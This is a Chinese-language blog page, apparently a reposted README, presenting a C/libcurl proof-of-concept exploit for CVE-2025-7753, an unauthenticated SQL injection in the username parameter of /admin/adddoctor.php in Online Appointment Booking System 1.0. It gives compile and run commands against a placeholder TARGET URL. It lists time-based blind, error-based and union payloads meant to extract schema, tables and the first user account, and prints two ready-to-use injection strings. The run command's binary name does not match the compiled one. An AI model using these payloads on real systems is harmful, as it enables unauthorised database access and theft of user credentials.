CVE-2025-7753 SQL注入漏洞利用详解

本文详细分析了Anisha在线预约系统1.0版本中存在的SQL注入漏洞CVE-2025-7753,提供了基于C语言的PoC利用代码,涵盖时间盲注、错误注入和联合查询等多种攻击技术。

🚨 CVE-2025-7753 — SQL注入PoC利用

作者: Byte Reaper
Telegram: @ByteReaper0
CVE: CVE‑2025‑7753
漏洞类型: 未授权时间盲注SQL注入


🔍 概述

Online Appointment Booking System 1.0 (Code‑Projects) 中的 /admin/adddoctor.php 文件存在严重SQL注入漏洞。username 参数未正确过滤,允许远程攻击者执行任意SQL查询(时间盲注、错误注入、联合查询、布尔盲注)。

本仓库提供首个公开的C语言PoC,利用libcurl进行HTTP请求,并使用ANSI彩色输出提高可读性。


⚙️ 环境要求

  • 操作系统: Linux (推荐x86_64)

  • 编译器: GCC 或 Clang

  • 依赖项:

    1
    2
    
    sudo apt update
    sudo apt install build-essential libcurl4-openssl-dev
    

🚀 编译与运行

编译命令:

1
gcc exploit.c argparse.c -o CODE_PROJECT -lcurl

执行命令(需要root权限):

1
sudo ./CODE_PROJECT-7753 -u http://TARGET/Online-Appointment-Booking-System-master/

详细模式(可选):

1
sudo ./CODE_PROJECT -u http://TARGET/... -v

📜 利用流程

环境检查确保运行在Linux系统并以root权限运行(必要时通过sudo自动提权)。

载荷数组包括:

  • 时间盲注 (SLEEP(5))
  • 错误注入 (RLIKE, CONCAT, COUNT)
  • 联合查询以提取数据库结构、用户、表名和首个用户账户

libcurl执行POST请求并捕获服务器响应。

响应解析扫描SQL错误字符串以确认漏洞存在。

🧪 测试载荷

1
2
3
11' AND (SELECT 9158 FROM (SELECT(SLEEP(5)))QYZI)-- LGFz
11' RLIKE (SELECT (CASE WHEN (1872=1872) THEN 11 ELSE 0x28 END))-- AfYm
... 等等

许可证

MIT

comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计